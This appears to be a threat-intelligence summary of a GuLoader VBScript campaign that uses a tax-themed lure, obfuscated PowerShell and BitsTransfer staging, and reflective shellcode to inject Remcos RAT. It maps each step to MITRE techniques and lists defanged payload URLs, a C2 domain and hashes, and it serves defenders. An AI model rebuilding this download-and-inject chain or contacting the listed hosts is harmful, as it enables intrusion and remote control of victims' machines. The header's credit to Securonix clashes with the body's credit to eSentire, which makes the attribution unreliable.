Threat Research

GuLoader VBScript Variant Returns with PowerShell Updates

Securonix

GuLoader’s VBScript variant uses a tax-themed lure and a multi-stage PowerShell chain to load shellcode and drop Remcos RAT, all while staying largely in memory and evading analysis. The TRU team details the execution flow, from initial user action to payload retrieval, reflective shellcode loading, and C2 communications, and provides defenses and detection recommendations. #GuLoader #Remcos #PowerShell #VBScript #TaxThemedLures #RemcosRAT

Keypoints

  • The GuLoader VBScript variant is triggered when a user clicks a malicious shortcut file, which launches PowerShell and retrieves a decoy document and a VBScript payload.
  • The VBScript file (Tefor.vbs) is highly obfuscated and concatenates many strings to build a PowerShell command, hindering analysis.
  • The PowerShell chain downloads a payload package via BitsTransfer containing the second-stage PowerShell and two shellcode buffers.
  • Shellcode A and B are loaded reflectively in memory, with Shellcode B responsible for fetching and injecting Remcos RAT into a legitimate Windows process (ieinstal.exe).
  • Remcos C2 communications are observed with zazuservr[.]com over port 9019, indicating a remote control channel for the payload.
  • eSentire’s TRU team emphasizes layered detection, phishing awareness training, and endpoint hardening to mitigate GuLoader campaigns.

MITRE Techniques

  • [T1059.001] PowerShell – The chain begins with a shortcut-triggered PowerShell execution that retrieves a decoy document and a VBS script. “Similar to the previous activity, GuLoader execution begins with the user clicking on a shortcut file and launching a PowerShell command, which retrieves a decoy tax document and VBS script.”
  • [T1059.005] VBScript – The Tefor.vbs file is highly obfuscated and builds a PowerShell command from hundreds of strings. “Like GuLoader VBScript variants in the past, this is highly obfuscated and contains junk code to impede analysis. The script concatenates hundreds of smaller strings into a single variable which ultimately builds and executes a PowerShell command.”
  • [T1105] Ingress Tool Transfer – BitsTransfer retrieves a payload package containing the second-stage PowerShell and two shellcode buffers. “BitsTransfer is used to retrieve a payload package containing the second stage PowerShell and two shellcode buffers.”
  • [T1055.012] Reflective Code Loading – Shellcode A and Shellcode B are reflectively loaded from the payload package. “Shellcode A is carved from the package and reflectively loaded. Shellcode B is decoded by Shellcode A and reflectively loaded.”
  • [T1055] Process Injection – Shellcode B injects Remcos RAT into a legitimate Windows process (ieinstal.exe). “Shellcode B is used to retrieve and inject Remcos RAT into a legitimate Windows process such as ieinstall.exe.”
  • [T1071.001] Web Protocols – Remcos RAT communicates to a remote C2 domain (zazuservr[.]com) over a port (9019). “Remcos RAT identified in this case communicates to zazuservr[.]com over port 9019.”
  • [T1027] Obfuscated/Compressed Files and Information – De-obfuscation routines are used to hide payloads and commands. “The PowerShell command contains various obfuscated strings… The final section contains the second stage PowerShell code:”

Indicators of Compromise

  • [File Hash] GuLoader/Remcos artifacts – f39329106b591529cc1d7e82f4cfbfa6, f6489874716c1684221548d18631e3a9, and 4 more hashes
  • [URL] Payload downloads – hxxp://194.55.224[.]183/frsh/Remimicra.hhp, hxxp://194.55.224[.]183/frsh/iFaeETTILhlw208.bin
  • [Domain] Command and control – zazuservr[.]com
  • [File Name] VBScript payload – Tefor.vbs

Read more: https://www.esentire.com/blog/guloader-vbscript-variant-returns-with-powershell-updates